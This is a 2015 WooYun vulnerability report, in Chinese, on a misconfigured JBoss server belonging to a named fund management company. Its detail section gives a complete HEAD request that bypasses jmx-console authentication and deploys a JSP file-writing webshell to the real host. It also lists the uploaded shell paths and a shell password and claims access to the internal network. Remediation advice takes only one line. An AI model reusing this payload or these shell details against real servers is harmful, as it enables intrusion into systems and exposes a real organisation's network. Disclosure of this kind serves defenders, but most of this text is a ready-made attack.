当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126735

漏洞标题:国泰基金某系统配置不当可导致再入系统威胁内网敏感信息泄漏

相关厂商:国泰基金管理有限公司

漏洞作者: 路人甲

提交时间:2015-07-17 12:47

修复时间:2015-08-31 12:48

公开时间:2015-08-31 12:48

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

系统配置不当,同时还发现了14年的马儿,证明运维没有好好的检查过系统,指哪删哪,只会让问题越来越多,

详细说明:

前人的漏洞已经公开,但针对 WooYun: 企业钱管家(国泰基金)配置不当导致getshell数据库以及财务信息泄露并且影响内网安全 漏洞中指出的问题invoker/JMXInvokerServlet未授权访问,已经被运维修复,修复方法是删除

QQ截图20150714154012.jpg


但是,jboss拿shell的方法还有head绕过jmx-console认证
经测试,可以成功上传shell

HEAD http://gtresearch.gtfund.com:8280/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=wooyun.war&argType=java.lang.String&&arg1=ixm&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True HTTP/1.1
Host: gtresearch.gtfund.com:8280
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=g7miec4a19jo3n2lm0r2drko41; pgv_pvi=1782018048; pgv_si=s2933281792; JSESSIONID=03C030B5227269E8573F39D5D441D1E3


QQ截图20150714154248.jpg


小马地址:http://gtresearch.gtfund.com:8280/wooyun/ixm.jsp

QQ截图20150714154426.jpg

漏洞证明:

利用小马上传一句话
一句话地址:http://gtresearch.gtfund.com:8280/wooyun/wooyun.jsp
密码:woo0yun

QQ截图20150714154833.jpg


QQ截图20150714155050.jpg


QQ截图20150714155111.jpg


可威胁内网

QQ截图20150714155149.jpg


QQ截图20150714155342.jpg


14年的shell今天还没有删除

QQ截图20150714155307.jpg


QQ截图20150714155326.jpg


QQ截图20150714155427.jpg

修复方案:

删除shell,删除jmx-console,修改jboss认证密码

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝